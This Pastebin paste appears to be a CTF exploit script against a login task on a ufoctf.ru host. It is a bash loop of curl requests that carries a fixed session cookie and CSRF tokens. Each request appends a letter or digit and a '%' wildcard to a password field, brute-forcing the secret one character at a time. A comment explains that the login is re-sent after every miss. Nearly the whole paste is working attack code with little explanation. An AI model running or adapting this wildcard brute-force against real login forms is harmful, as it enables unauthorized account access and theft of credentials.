Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- ff=""
- curl --silent --cookie "PHPSESSID=il5gaeg4jsopmcdiqq4on80cq5" "http://a1galaxy.tasks.ufoctf.ru/?getback"
- curl --silent --cookie "PHPSESSID=il5gaeg4jsopmcdiqq4on80cq5" -d "username=admin1&password=MyPasswordIsNotTheFlag&csrf_token=2bb211be9683b674066d16405f9439aa&confirm=yes" "http://a1galaxy.tasks.ufoctf.ru/?"
- # ^^^ these queries are sended in case the query don't match a char. so i re-start the auth else i could not continue brute-ing.
- for i in {a..z}; do
- echo $i
- curl --silent --cookie "PHPSESSID=il5gaeg4jsopmcdiqq4on80cq5" -d "username=admin1&level1_password=MyPasswordIsNotTheFlag&level2_password="$ff$i"%"&csrf_token=6680b3127ff1df4704f8cededb92dbec&confirm=yes" "http://a1galaxy.tasks.ufoctf.ru/?"
- done
- for i in {0..9}; do
- echo $i
- curl --silent --cookie "PHPSESSID=il5gaeg4jsopmcdiqq4on80cq5" -d "username=admin1&level1_password=MyPasswordIsNotTheFlag&level2_password="$ff$i"%"&csrf_token=6680b3127ff1df4704f8cededb92dbec&confirm=yes" "http://a1galaxy.tasks.ufoctf.ru/?"
- done
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement